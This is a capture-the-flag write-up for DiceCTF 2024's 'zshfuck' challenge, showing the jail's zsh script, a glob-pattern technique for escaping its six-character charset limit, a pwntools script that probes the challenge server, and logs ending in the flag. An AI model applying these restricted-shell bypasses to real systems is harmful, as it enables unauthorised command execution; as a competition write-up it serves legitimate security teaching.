DiceCTF 2024 — zshfuck
may your code be under par. execute the
getflagbinary somewhere in the filesystem to win
nc mc.ax 31774
We're given a zsh script that looks like this:
Code (zsh):
1#!/bin/zsh
2print -n -P "%F{green}Specify your charset: %f"
3read -r charset
4# get uniq characters in charset
5charset=("${(us..)charset}")
6banned=('*' '?' '`')
7
8if [[ ${#charset} -gt 6 || ${#charset:|banned} -ne ${#charset} ]]; then
9 print -P "\n%F{red}That's too easy. Sorry.%f\n"
10 exit 1
11fi
12print -P "\n%F{green}OK! Got $charset.%f"
13charset+=($'\n')
14
15# start jail via coproc
16coproc zsh -s
17exec 3>&p 4<&p
18
19# read chars from fd 4 (jail stdout), print to stdout
20while IFS= read -u4 -r -k1 char; do
21 print -u1 -n -- "$char"
22done &
23# read chars from stdin, send to jail stdin if valid
24while IFS= read -u0 -r -k1 char; do
25 if [[ ! ${#char:|charset} -eq 0 ]]; then
26 print -P "\n%F{red}Nope.%f\n"
27 exit 1
28 fi
29 # send to fd 3 (jail stdin)
30 print -u3 -n -- "$char"
31doneWe're asked for a "charset" of 6 unique characters, and given a shell where only those characters are allowed. *, ?, and ` are banned.
The key here is that we can use pattern matching with brackets to match characters one at a time. The directory the shell starts in contains
Code:
1/app
2 |--- run (the jail shell script)
3 |--- y0u (the directory you want to search in)which are both 3 characters long, so choose the character set
Code:
1.[^0]/and use 0 and [^0] to distinguish between the two.
Then, keep adding [^0]s to match characters, checking the return message in the shell to determine when to add a / to move down a directory:
Heres a Python script to automate just that:
Code (python):
1import pwn
2
3charset = b'.[^0]/\n'
4cmd = './[^0]0[^0]/[^0][^0][^0][^0]/'
5
6while True:
7 conn = pwn.remote('mc.ax', 31774)
8
9 conn.recv(numb=27)
10 conn.send(charset)
11 conn.recvline()
12 conn.recvline()
13
14 cmd += '[^0]'
15 conn.send((cmd + '\n').encode())
16
17 ret = conn.recvline().decode('utf8')
18 print(ret)
19 if ret.startswith('dice'):
20 break
21 elif not ret.startswith('zsh: no matches found:'):
22 cmd += '/'
23
24 conn.close()Code:
1[x] Opening connection to mc.ax on port 31774
2[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
3[+] Opening connection to mc.ax on port 31774: Done
4zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0]
5
6[*] Closed connection to mc.ax port 31774
7[x] Opening connection to mc.ax on port 31774
8[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
9[+] Opening connection to mc.ax on port 31774: Done
10zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0]
11
12[*] Closed connection to mc.ax port 31774
13[x] Opening connection to mc.ax on port 31774
14[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
15[+] Opening connection to mc.ax on port 31774: Done
16zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0]
17
18[*] Closed connection to mc.ax port 31774
19[x] Opening connection to mc.ax on port 31774
20[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
21[+] Opening connection to mc.ax on port 31774: Done
22zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0]
23
24[*] Closed connection to mc.ax port 31774
25[x] Opening connection to mc.ax on port 31774
26[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
27[+] Opening connection to mc.ax on port 31774: Done
28zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0]
29
30[*] Closed connection to mc.ax port 31774
31[x] Opening connection to mc.ax on port 31774
32[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
33[+] Opening connection to mc.ax on port 31774: Done
34zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0]
35
36[*] Closed connection to mc.ax port 31774
37[x] Opening connection to mc.ax on port 31774
38[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
39[+] Opening connection to mc.ax on port 31774: Done
40zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0]
41
42[*] Closed connection to mc.ax port 31774
43[x] Opening connection to mc.ax on port 31774
44[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
45[+] Opening connection to mc.ax on port 31774: Done
46zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0]
47
48[*] Closed connection to mc.ax port 31774
49[x] Opening connection to mc.ax on port 31774
50[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
51[+] Opening connection to mc.ax on port 31774: Done
52zsh: permission denied: ./y0u/w1ll/n3v3r_g3t
53
54[*] Closed connection to mc.ax port 31774
55[x] Opening connection to mc.ax on port 31774
56[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
57[+] Opening connection to mc.ax on port 31774: Done
58zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0]
59
60[*] Closed connection to mc.ax port 31774
61[x] Opening connection to mc.ax on port 31774
62[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
63[+] Opening connection to mc.ax on port 31774: Done
64zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0]
65
66[*] Closed connection to mc.ax port 31774
67[x] Opening connection to mc.ax on port 31774
68[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
69[+] Opening connection to mc.ax on port 31774: Done
70zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0]
71
72[*] Closed connection to mc.ax port 31774
73[x] Opening connection to mc.ax on port 31774
74[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
75[+] Opening connection to mc.ax on port 31774: Done
76zsh: permission denied: ./y0u/w1ll/n3v3r_g3t/th1s
77
78[*] Closed connection to mc.ax port 31774
79[x] Opening connection to mc.ax on port 31774
80[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
81[+] Opening connection to mc.ax on port 31774: Done
82zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0]
83
84[*] Closed connection to mc.ax port 31774
85[x] Opening connection to mc.ax on port 31774
86[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
87[+] Opening connection to mc.ax on port 31774: Done
88zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0]
89
90[*] Closed connection to mc.ax port 31774
91[x] Opening connection to mc.ax on port 31774
92[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
93[+] Opening connection to mc.ax on port 31774: Done
94zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0]
95
96[*] Closed connection to mc.ax port 31774
97[x] Opening connection to mc.ax on port 31774
98[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
99[+] Opening connection to mc.ax on port 31774: Done
100zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0]
101
102[*] Closed connection to mc.ax port 31774
103[x] Opening connection to mc.ax on port 31774
104[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
105[+] Opening connection to mc.ax on port 31774: Done
106zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0]
107
108[*] Closed connection to mc.ax port 31774
109[x] Opening connection to mc.ax on port 31774
110[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
111[+] Opening connection to mc.ax on port 31774: Done
112zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0]
113
114[*] Closed connection to mc.ax port 31774
115[x] Opening connection to mc.ax on port 31774
116[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
117[+] Opening connection to mc.ax on port 31774: Done
118dice{d0nt_u_jU5T_l00oo0ve_c0d3_g0lf?}
119
120[*] Closed connection to mc.ax port 31774